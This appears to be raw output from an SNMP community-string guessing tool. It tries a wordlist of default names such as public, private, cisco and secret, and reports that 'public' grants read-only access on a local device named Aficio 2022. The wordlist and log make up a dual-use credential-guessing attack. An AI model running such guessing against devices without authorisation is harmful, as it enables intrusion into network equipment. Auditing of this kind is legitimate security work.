>>>>>>>>>>> get req name=SUN id = 23 >>>>>>>>>>>
>>>>>>>>>>> get req name=access id = 26 >>>>>>>>>>>
>>>>>>>>>>> get req name=admin id = 29 >>>>>>>>>>>
>>>>>>>>>>> get req name=agent id = 32 >>>>>>>>>>>
>>>>>>>>>>> get req name=all id = 35 >>>>>>>>>>>
>>>>>>>>>>> get req name=cisco id = 38 >>>>>>>>>>>
>>>>>>>>>>> get req name=community id = 41 >>>>>>>>>>>
>>>>>>>>>>> get req name=default id = 44 >>>>>>>>>>>
>>>>>>>>>>> get req name=enable id = 47 >>>>>>>>>>>
>>>>>>>>>>> get req name=field id = 50 >>>>>>>>>>>
>>>>>>>>>>> get req name=guest id = 53 >>>>>>>>>>>
>>>>>>>>>>> get req name=hello id = 56 >>>>>>>>>>>
>>>>>>>>>>> get req name=ibm id = 59 >>>>>>>>>>>
>>>>>>>>>>> get req name=manager id = 62 >>>>>>>>>>>
>>>>>>>>>>> get req name=mngt id = 65 >>>>>>>>>>>
>>>>>>>>>>> get req name=monitor id = 68 >>>>>>>>>>>
>>>>>>>>>>> get req name=netman id = 71 >>>>>>>>>>>
>>>>>>>>>>> get req name=network id = 74 >>>>>>>>>>>
>>>>>>>>>>> get req name=none id = 77 >>>>>>>>>>>
>>>>>>>>>>> get req name=openview id = 80 >>>>>>>>>>>
>>>>>>>>>>> get req name=pass id = 83 >>>>>>>>>>>
>>>>>>>>>>> get req name=password id = 86 >>>>>>>>>>>
>>>>>>>>>>> get req name=private id = 89 >>>>>>>>>>>
>>>>>>>>>>> get req name=proxy id = 92 >>>>>>>>>>>
>>>>>>>>>>> get req name=public id = 95 >>>>>>>>>>>
<<<<<<<<<<< id =" 96" name =" public" ret ="0">>>>>>>>>>>>> send setrequest id = 96 name = public >>>>>>>>
>>>>>>>>>>> get req name=read id = 98 >>>>>>>>>>>
<<<<<<<<<<< id =" 97" name =" public" ret ="0">>>>>>>>>>>> get req name=read-only id = 101 >>>>>>>>>>>
>>>>>>>>>>> get req name=read-write id = 104 >>>>>>>>>>>
>>>>>>>>>>> get req name=root id = 107 >>>>>>>>>>>
>>>>>>>>>>> get req name=router id = 110 >>>>>>>>>>>
>>>>>>>>>>> get req name=secret id = 113 >>>>>>>>>>>
>>>>>>>>>>> get req name=security id = 116 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmp id = 119 >>>>>>>>>>>
>>>>>>>>>>> get req name=snmpd id = 122 >>>>>>>>>>>
>>>>>>>>>>> get req name=solaris id = 125 >>>>>>>>>>>
>>>>>>>>>>> get req name=sun id = 128 >>>>>>>>>>>
>>>>>>>>>>> get req name=switch id = 2 >>>>>>>>>>>
>>>>>>>>>>> get req name=system id = 5 >>>>>>>>>>>
>>>>>>>>>>> get req name=tech id = 8 >>>>>>>>>>>
>>>>>>>>>>> get req name=test id = 11 >>>>>>>>>>>
>>>>>>>>>>> get req name=world id = 14 >>>>>>>>>>>
>>>>>>>>>>> get req name=write id = 17 >>>>>>>>>>>
snmp check on 127.0.0.1
sys.sysName.0:Aficio 2022
name = public readonly access